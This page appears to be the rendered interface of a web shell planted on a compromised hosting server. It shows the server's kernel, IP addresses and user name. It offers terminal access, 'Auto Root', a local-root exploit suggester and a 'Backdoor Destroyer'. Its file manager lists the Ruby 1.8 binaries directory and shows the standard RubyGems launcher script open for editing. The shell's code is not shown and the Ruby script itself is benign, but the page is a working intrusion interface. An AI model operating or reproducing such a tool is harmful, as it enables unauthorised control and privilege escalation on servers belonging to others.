Linux server19.dn-server.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 46.209.20.154 & Your IP : 216.73.217.55
Domains :
Cant Read [ /etc/named.conf ]
User : emadteam
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby18 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
erb
3.8
KB
-rwxr-xr-x
2023-07-26 17:08
gem
894
B
-rwxr-xr-x
2015-01-25 21:46
irb
384
B
-rwxr-xr-x
2023-07-26 17:08
rackup
459
B
-rwxr-xr-x
2019-05-03 11:42
rdoc
1.51
KB
-rwxr-xr-x
2023-07-26 17:08
ri
1.46
KB
-rwxr-xr-x
2023-07-26 17:08
ruby
7
KB
-rwxr-xr-x
2023-07-26 17:10
testrb
158
B
-rwxr-xr-x
2023-07-26 17:08
Save
Rename
#!/opt/alt/ruby18/bin/ruby #-- # Copyright 2006 by Chad Fowler, Rich Kilmer, Jim Weirich and others. # All rights reserved. # See LICENSE.txt for permissions. #++ # The prelude in 1.9.1 injects rubygems.rb into $LOADED_FEATURES # which prevents the `require 'rubygems'` from actually loading # the site's version of rubygems. So we have to use it's API # to get it's prelude out of the way. # if RUBY_VERSION =~ /^1\.9\.1/ && defined?(Gem::QuickLoader) Gem::QuickLoader.load_full_rubygems_library end require 'rubygems' require 'rubygems/gem_runner' require 'rubygems/exceptions' required_version = Gem::Requirement.new ">= 1.8.7" unless required_version.satisfied_by? Gem.ruby_version then abort "Expected Ruby Version #{required_version}, is #{Gem.ruby_version}" end args = ARGV.clone begin Gem::GemRunner.new.run args rescue Gem::SystemExitException => e exit e.exit_code end